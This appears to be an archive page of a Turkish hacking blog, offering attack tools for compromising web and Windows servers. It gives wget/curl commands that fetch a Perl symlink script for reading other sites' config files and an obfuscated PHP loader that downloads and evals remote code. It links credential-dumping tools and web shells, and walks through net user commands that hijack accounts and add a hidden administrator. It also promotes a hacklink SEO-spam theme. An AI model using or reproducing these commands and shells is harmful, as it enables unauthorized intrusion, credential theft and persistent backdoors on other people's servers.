Güncell Konular ;
Archive for Temmuz 2019
Genellikle Apache Sunucularda İşinizce yarıcak bu araç symlink in symlink komutunu kullanmadan
işlemi yaptığı için per olan tüm sunucularda kolaylıkla çalıştırabilirsiniz kullanımına geçelim,
KOMUTLAR :
$ wget https://b0ru70.github.io/Exploit/UploadExploit/prvsym.pl
eğer sunucuda wget çalışmıyosa;
$ curl -O https://b0ru70.github.io/Exploit/UploadExploit/prvsym.pl
Gerekli aracımızı sunucuya çektik şimdi çalıştıralım
$ perl prvsym.pl
ardından komutları çalıştırdığınız klosorde b0_sym diye bir klosor olusucak bu klosoru direk url den açın eğer karşınıza config txt leri çıkarsa işlem başarılıdır.
Tag :// Apache Bypass,
Tag :// apache bypass tool,
Tag :// linux server bypass,
Tag :// perl bypass tool,
Tag :// perl shell,
Tag :// perl symlink,
Tag :// priv sym,
Tag :// priv symlink,
Tag :// server bypass
Altta verciğim php kodunu (supershell.php) olarak kaydedip kullanabilirsiniz piyasada bulunan tüm anti li serverleri bypasslamaktadır. [shell yemeyen siteler için]
<?php
$otuzbir = 'ba'.'se'. 128/2 .'_' .'de'.'co'.'de';
$otuziki = ("http://b0ru70.github.io/gg");
$otuzuc = file_get_contents($otuziki);
eval("?>".($otuzbir($otuzuc)));
?>
Tag :// B0RU70 SHELL,
Tag :// bypass shell,
Tag :// priv,
Tag :// priv shell,
Tag :// priv8,
Tag :// shell
Premium Hacklink / SEO Culara özel blogspot temasıdır (.xml) olarak kullanabilirsiniz.
bol bol konu kasıp linkle beslemeniz yeterlidir seo uyumlu olduğu için istediğiniz keyde yükselicektir..
PASTEBİN: https://pastebin.com/raw/603wgerT
Tag :// blogspot,
Tag :// blogspot tema,
Tag :// blogspot theme,
Tag :// blotspot teması,
Tag :// hacklink,
Tag :// hacklink theme,
Tag :// seo theme,
Tag :// spyhackerz blogspot
DAHA ÖNCEDEN ARAÇ TAKVİYESİ OLADAN NASIL ROOT OLABİLCEĞİNİZİ ANLATMIŞTIK = BKNZ
Bu konumuzda sizlere "tool / araç" yardımı ile windows sunucuların root hesap yada içerdeki hesapların (net user) nasıl şifrelerini dğeiştirmeden çekebilceğinizi anlatıcağım.
İlk olarak .aspx shell yiyen windows serverımıza verdiğim wr00t.exe yi upload edin ardından aspx shell imizdeki cmd yerine gelip verdiğim 2 komuttan birini yazın (2 side aynı şeyi yapar.)
$ wr00t.exe
yada
$ wr00t
ardından çıktı olarak userları size vericektir genelde root işlemlerini hiçbirini yememiş olan windows sunucularda kullanılan ve az bilinen bir methoddur.
Blog sitemizi takipte kalın daha güzel araşlarında paylaşımı yapılıcaktır..
TOOL İNDİR:
* https://anonfile.com/c5tfr00fne/wr00t_exe
* https://b0ru70.github.io/Exploit/Kernelr00t/wr00t.zip
* https://gofile.io/?c=FTfUqx
Bu şekilde window sunucularda root olabilirsiniz iyi hackingler..
Tag :// windows admin,
Tag :// windows root,
Tag :// windows root tool,
Tag :// windows server exploit,
Tag :// windows server hack,
Tag :// windows server hacked,
Tag :// windows server root,
Tag :// windows server rooted
Sitede sonsuza dek free diyor.
Sitede yıllık hosting fiyatı 0.1$ mış
ÖZELLİKLERİ:
No Credit Card Required
1000 MB storage
Unlimited bandwidth
2 Email Addresses
2 FTP Account
Website Builder (TRIAL)
Auto Installer
SEO Tools
CDN (Cloud Flare)
Self Backup
Knowledge Base, Email Support
Cloud Linux Limited
No Lite Speed
Standard Drive
1 Data Center
100 MBPS Shared Uplink
99.95% Uptime
Tag :// bedava host,
Tag :// bedava hosting,
Tag :// bedava site,
Tag :// free cpanel hosting,
Tag :// free host,
Tag :// free hosting
Yöntem Yöntem Anlatıcağım Önce Başıt Olandan Başlayayım;
1- EN BASİT YOL:
Upload ettiğiniz shellin terminaline=
$ net user
komutunu girin çıkan kullanıcılardan birini kopyalayın sallıyorum kullanıcı B0RU70 Olsun komutu girip şifresini dğeiştiricez=
$ net user B0RU70 123456
Artından sunucu ip sini uzak masaüstü aracına yapıştırıp id pass ı yazıp sunucuya bağlanın artık rootsunuz.
2- USER EKLE YETKİ VER (BASİT YOL):
İlk önce "net stat" komutunu yazıpp çalştırıpından emin oluyoruz komut çalışıyosa=
$ net user B0RU70 123456!'^+%&/ /add
birdaha "net stat" yazdığımızda b0ru70 die bi kullanıcı oluşturmuş olucaz şimdi ona admin yetkisi verelimki bağlanabilelim=
$ net localgroup Administrators B0RU70 /add
bu yöntemde bu kadar basit.
3- ASPX SHELL KULLANMA:
Yukarda verdiğimim komutlar normal shellinizde çalışmıyorsa size verdiğim shelli indirip onunla çalıştırın ve rootsunuz :)
İNDİR:
1) https://pastebin.com/raw/zfAbgXLi
2) https://anonfile.com/U19fR9y2na/powershell_aspx
3) https://www.pastebinz.com/raw/CLxzmTRNgM
İyi hackingler..
Tag :// apsx shell,
Tag :// priv,
Tag :// priv8,
Tag :// wiindows bypass,
Tag :// windows exploit,
Tag :// windows hack,
Tag :// windows hackleme sunucu,
Tag :// windows kullanıcı ekleme,
Tag :// windows rootlama,
Tag :// windows server bypass,
Tag :// windows server root,
Tag :// wondows root
Öncelikle Bi saçmalığı bitirerek başlıyım makaleme windowsda mac de olduğu gibi linux dada rat ve virüsler bulunmakta anca windows daki kadar yaygın dğeil. yani linux a geçin virüs yemeyin tamamen uydurmadan ibarettir. ancak windows a kıyasla daha az zararlı yazılım olduğu için ve güvenlik sistemi çekirdeği daha gelişmiş olduğu için pentester ve avscan sistemlerinin kullandığı sistem genelde linux dur. Bu Soru işaretini giderdiğimize göre asıl konumuza geçelim;
Neden Linux Kullanıyorum,
Bundan 4 Yıl evvel zaten oyun oynamıyorum boş zaman kaybı diyip programlamaya odaklandım tamamen ve elimdeki pc suanki kadar iyi olmaması sebebiyle windows da istediğim verimi alamyordum araştırmalarımla "Backbox" u kurdum hem tooları bulunduruyor hemde xfce gibi hafif birt masaüstü olduğu için pcmi artık daha verimli ve daha iyi kullanabiliyordum zamanla elim alıştı artık windows bir pc ye geçince cahil kalıcak hale gleiyorum tamamen linux os a odaklandım. bunun bana faydaları da oldu günümüzdeki hostlar linux genelde. sistemi ne kadar iyi tanırsan method üretmen ve olanları kavrayıp kullanman o kadar kolay oluyor.
Peki Linux a yeni başlayanlara hangi dağıtımları öneririm =
* Ubuntu
* Mint
* Backbox
* Parrot OS
* Fux
Yukarda Verdiğim OS Ları Kullanabilirsiniz.
İyi Şanslar..
Her server in yediği " .php ve .phtml " uzantılarıyla kullanabilceğiniz bir shelldir. sitede kalıcı olmak istiyorsanız sitenin 2-3 yerine yedekleyip sonra bakmak için kullanabilirsiniz yada hiçbir shell yemiyorsa kullanırsınız.
PASTEBİN: https://www.pastebinz.com/raw/033BrEjM26
İNDİR:
Tag :// .phtml,
Tag :// .phtml shell,
Tag :// b0ru70 priv,
Tag :// B0RU70 SHELL,
Tag :// b0ru70 shell indir,
Tag :// mini shell,
Tag :// phtml shell,
Tag :// priv shell,
Tag :// shell,
Tag :// web shell
<?php
###############################################################
# cPanel Subdomains Creator 1.1
###############################################################
# Visit https://b0ru70.blogspot.com
###############################################################
#
# Can be used in 3 ways:
# 1. just open script in browser and fill the form
# 2. pass all info via url and form will not appear
# Sample: cpanel_subdomains.php?cpaneluser=USER&cpanelpass=PASSWORD&domain=DOMAIN&subdomain=SUBDOMAIN
# 3. list subdomains in file. In this case you must provide all the defaults below
#
# Note: you can omit any parameter, except "subdomain".
# When omitted, default value specified below will be taken
###############################################################
// cpanel user
define('CPANELUSER','user');
// cpanel password
define('CPANELPASS','pass');
// name of the subdomains list file.
// file format may be 1 column or 2 columns divided with semicilon (;)
// Example for two columns:
// rootdomain1;subdomain1
// rootdomain1;subdomain2
// Example for one columns:
// subdomain1
// subdomain2
define('INPUT_FILE','domains.txt');
// cPanel skin (mainly "x")
// Check http://www.zubrag.com/articles/determine-cpanel-skin.php
// to know it for sure
define('CPANEL_SKIN','x');
// Default domain (subdomains will be created for this domain)
// Will be used if not passed via parameter and not set in subdomains file
define('DOMAIN','');
/////////////// END OF INITIAL SETTINGS ////////////////////////
////////////////////////////////////////////////////////////////
function getVar($name, $def = '') {
if (isset($_REQUEST[$name]) && ($_REQUEST[$name] != ''))
return $_REQUEST[$name];
else
return $def;
}
$cpaneluser=getVar('cpaneluser', CPANELUSER);
$cpanelpass=getVar('cpanelpass', CPANELPASS);
$cpanel_skin = getVar('cpanelskin', CPANEL_SKIN);
if (isset($_REQUEST["subdomain"])) {
// get parameters passed via URL or form, emulate string from file
$doms = array( getVar('domain', DOMAIN) . ";" . $_REQUEST["subdomain"]);
if (getVar('domain', DOMAIN) == '') die("You must specify domain name");
}
else {
// open file with domains list
$doms = @file(INPUT_FILE);
if (!$doms) {
// file does not exist, show input form
echo "
Cannot find input file with subdomains information. It is ok if you are not creating subdomains from file.<br>
Tip: leave field empty to use default value you have specified in the script's code.<br>
<form method='post'>
Subdomain:<input name='subdomain'><br>
Domain:<input name='domain'><br>
cPanel User:<input name='cpaneluser'><br>
cPanel Password:<input name='cpanelpass'><br>
cPanel Skin:<input name='cpanelskin'><br>
<input type='submit' value='Create Subdomain' style='border:1px solid black'>
</form>";
die();
}
}
// create subdomain
function subd($host,$port,$ownername,$passw,$request) {
$sock = fsockopen('localhost',2082);
if(!$sock) {
print('Socket error');
exit();
}
$authstr = "$ownername:$passw";
$pass = base64_encode($authstr);
$in = "GET $request\r\n";
$in .= "HTTP/1.0\r\n";
$in .= "Host:$host\r\n";
$in .= "Authorization: Basic $pass\r\n";
$in .= "\r\n";
fputs($sock, $in);
while (!feof($sock)) {
$result .= fgets ($sock,128);
}
fclose( $sock );
return $result;
}
foreach($doms as $dom) {
$lines = explode(';',$dom);
if (count($lines) == 2) {
// domain and subdomain passed
$domain = trim($lines[0]);
$subd = trim($lines[1]);
}
else {
// only subdomain passed
$domain = getVar('domain', DOMAIN);
$subd = trim($lines[0]);
}
// http://[domainhere]:2082/frontend/x/subdomain/doadddomain.html?domain=[subdomain here]&rootdomain=[domain here]
$request = "/frontend/$cpanel_skin/subdomain/doadddomain.html?rootdomain=$domain&domain=$subd";
$result = subd('localhost',2082,$cpaneluser,$cpanelpass,$request);
$show = strip_tags($result);
echo $show;
}
?>